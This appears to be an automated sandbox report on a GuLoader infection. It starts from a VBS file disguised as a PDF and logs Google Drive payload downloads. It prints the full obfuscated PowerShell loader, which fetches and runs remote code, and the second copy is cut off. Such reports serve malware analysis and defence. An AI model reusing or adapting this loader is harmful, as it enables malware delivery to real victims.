                                                                2025-03-10 19:37:42 UTC | 215 | OUT | GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                Host: drive.google.com
                                                                Connection: Keep-Alive
                                                                2025-03-10 19:37:43 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Mon, 10 Mar 2025 19:37:42 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-8ta7hqKdrt06UvZo71AUXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                1 | 192.168.2.5 | 49708 | 142.250.181.238 | 443 | 7624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-03-10 19:37:49 UTC | 97 | OUT | GET /uc?export=download&id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm HTTP/1.1
                                                                Host: drive.google.com
                                                                2025-03-10 19:37:50 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Mon, 10 Mar 2025 19:37:50 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-m1lWY7PWaqjRAEzx2j-LBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                2 | 192.168.2.5 | 49709 | 172.217.16.193 | 443 | 7624 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-03-10 19:37:52 UTC | 139 | OUT | GET /download?id=12OP5AsIYXeKON8azV9Dts0sJhjUxJTsm&export=download HTTP/1.1
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-03-10 19:37:55 UTC | 5016 | IN | HTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AKDAyItu9u0Fk2JKwE4KIseLiJYLgxeq1HSa_D12zuxm85TLIyjrFsjcVhpLfgF4cBCQKVdIfKHZ5d0
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="Skrnernes.toc"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 516244
                                                                Last-Modified: Mon, 10 Mar 2025 08:05:57 GMT
                                                                Date: Mon, 10 Mar 2025 19:37:55 GMT
                                                                Expires: Mon, 10 Mar 2025 19:37:55 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=M+qklQ==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                3 | 192.168.2.5 | 49716 | 142.250.181.238 | 443 | 4752 | C:\Windows\SysWOW64\msiexec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-03-10 19:38:58 UTC | 216 | OUT | GET /uc?export=download&id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2025-03-10 19:38:58 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Mon, 10 Mar 2025 19:38:58 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ry373WwkV7okSpL414PalQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                4 | 192.168.2.5 | 49717 | 172.217.16.193 | 443 | 4752 | C:\Windows\SysWOW64\msiexec.exe
                                                                Timestamp | Bytes transferred | Direction | Data
                                                                2025-03-10 19:39:01 UTC | 258 | OUT | GET /download?id=1xJUHcOwTYLF4CpOb43j4CAGUq-W1-b4b&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-03-10 19:39:04 UTC | 5012 | IN | HTTP/1.1 200 OK
                                                                X-GUploader-UploadID: AKDAyIssx_o1Ab4kLaJuDepBaAMmGcU8FK6Q79YI7MFv7e7zs8NwEnTbtApVPSFfiYAhq02x
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="CTwthOabqg78.bin"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 498752
                                                                Last-Modified: Mon, 10 Mar 2025 08:04:28 GMT
                                                                Date: Mon, 10 Mar 2025 19:39:03 GMT
                                                                Expires: Mon, 10 Mar 2025 19:39:03 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=y/cwHg==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close



                                                                Target ID:0
                                                                Start time:15:37:35
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs"
                                                                Imagebase:0x7ff73b930000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:1
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\PING.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:ping Host_6637.6637.6637.657e
                                                                Imagebase:0x7ff79bcd0000
                                                                File size:22'528 bytes
                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7e2000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill Hipe ammnGuldsYrt . 
ilsH weeReacaKvardExoreInddr acosUd n[Syda$fjerGPersyelsalSe edSponiGr ngKorth egneVided nsee uldrBest] Una=over$Top CLambhBogsoChorr MireAilumDa aeSpekn');$Karaffelen=raspite 'gene$CyklKDatanHumoipr.spUrcel ConiBearn Se.gTv,nsReprkS iajForkoSko,lTe teTempnKvarstids.SlagDStimoOli wSkran ontlOligoArtiaU,gedIntwF TariSupel Fa eObs (Shel$XiphRU reeTil,aD bocDdnic LivebutnpHimmt DiveUnhod R.v, Kal$.aleM DiteTranrcre kgrunaNonbn BantTrani TrilSa eiForbsB lle GatrEx eiTrann ShagombyePopurBygms mph)';$Merkantiliseringers=$Growled96;Xanthorrhiza (raspite 'Opp,$FinaGHi,llcrawO TriB h saBiblLtri :gra rChikikrantHef,UKat,aGrinl.estI f isfearETestrobe e P.c=Gr e(Pil.TPr dE .pfs soctisod-CadepBoykASievtPsych Pro Vibr$O,maMSympe PlaRUns k I tA Co N AuktNon.iKaprlT.rnIStenScockeEkspRPos,i .itnParkgbad eOnobRPl tsHjre)');while (!$Ritualisere) {Xanthorrhiza (raspite ' Ta $Resig MaclS.rfo.lotbAppraNrdelKnu,: epoKBlijaBlenrPoacaAuthvLandaOch nNardeart rDeth=Etym$flatHP.rtu PanmHaggaG nsnHr cicirko storU.dea') ;Xanthorrhiza $Karaffelen;Xanthorrhiza (raspite 'Effe[bralTErhvH RidrCoene Ga.aprecd PerIA ernGemiG Dum. 
drTVerdh OutRBevaeSystAPublDPhth]Timo:Cha : AdosSymjLUnvoEUddee ngPTili(Udfo4Bo.c0.est0Anti0Halv)');Xanthorrhiza (raspite ' U d$ esgBri.L EleOLunhB T,oAHaleLD ab:As eRSubciForbTFjeluElb.AUnliLConvIforbS G,nefor.rRo,ee,ran=Inte(Hot,tPeneELaans Alktlupa- romPK meAGenkTPolyhP um Rade$MaddmBadeEProsrHa pkD apaslagNPeratsiveIBal.lyaw IUngpsUdsgeSoutr inei irkn GasgMellESa mRFugtscomm)') ;Xanthorrhiza (raspite 'Samm$ DrvGN ctlH aloScioBCasta verLRibo:FordlTrisYS.reSBumsaCo vA AfkRL njeScatN.yheeLind=Indp$N,rmgYam lEm lOBedrbP,icAFor,LTy.i:Tan EArtirBrasSR prtLastA Ur TCoupn MeniPopunCacaGFr.nSTottVH lvA nadNvirgdCynoEDeset NonS oru+Borg+Run.% Sej$MyceE nterCaumyRun,tSo,rhShasRSemioCoueC BoryFullT tapESlagSWe,d.SleeCSn roCompUResan arnT') ;$Reaccepted=$Erythrocytes[$Lysaarene]}$Svingfjer=356763;$Gastroenterocolostomy=30418;Xanthorrhiza (raspite 'triu$ApotGFootLFlyvOSiftbUnthaTykmLCate:AcoebAer OHulvB DefEOpkosRobet H py etrRTvanefje RAr enForaeTe tsKali penu= Iri TrangVel eAmalTAlth- RhuCS.ooOph enethnt orseBillNReleTCa a Ps u$CampmUnnaEDe,irDisakSacraFinaNTintTF eri,nopLkrani remSHeavEcoilrDetaiPredn.olkGFor ETts.RDkvas');Xanthorrhiza (raspite 'Tran$T.legDek lGodkoJymobBondaT pal Skr:StemUBor nRetspK llrgaa o UtavB,rbeFrerrdemobDenaiInteaMandlCo,tlOut yFjsi2Non 4Nonp Abra=Ca.a Lo,o[ BurSBestyPachs UdktFolkeKikkmT.sp.FileCSnowoKlatnRkesvTerteFo.orAfprt d m]Kart:unde: DamFSworrSupeoOpremS.riB Bu a HoesSie eBorg6Diss4Hym S tratungarBelliAl entragg yvi(Arbe$BegrBF ntokopubIm,re Subs D,ltus nyHkker eleeDatarUnd.n ,kse alasK an)');Xanthorrhiza (raspite 'Pasn$AfprGCro l ingoMarkbWolfALongL Ml : U oScurtK CabEAmphPWofuTOps.iTrojkDysteFyl rHypeNTorpEDess Fors=Ophi Per[ Kurs G ay Tr.SDr.rT AudEIntrmRati.HammTOv rEPantXKnhaT re.Ato.E ResNSelec Va,oSkemD I li Pern.estGNedf]P as:Unep:KanaaUmensForsCD.sqiCoffiefte.C nvG F,rE oenTProts kedtContrKnsrICen N tarGSpad(Sulp$S laU I dnUnd pRe,erEag o,erkVMilleGrdaRDinnBPaasiLannA SceLProsLB.gbY eun2Tank4Disk)');Xanthorrhiza (raspite ' 
Ban$overGMassLKrydoOverbTentaFil LHo.e:CaecaCampNSammAVikaRKoldIDestTUds H tedICentALune=Vivi$genssForsk Lare GylpEtnoTAl mIMausK,ulkeSuper ejnDespEHol .LedvsArgyU fa.bCoe.SKeysTAntiRvelmIN nfn runG ede( Jig$Thu sHamaVNontIFr bnforhGT.arfBan JToole SmerEury,Bet $D.vig uezabeshs ettt,iderHi toSterE D unCairT TvieDiodrUdvaoHeteC ForoKontL Ta.OBoykS enTFodrO GulM P eYPast)');Xanthorrhiza $anarithia;"
                                                                Imagebase:0x7ff7785e0000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1582725505.0000026D10302000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:15:37:36
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7e2000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:15:37:59
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBollpPatrl MiriHivensupegUnl,sCombk.ealjFuksoStill Hipe ammnGuldsYrt . 
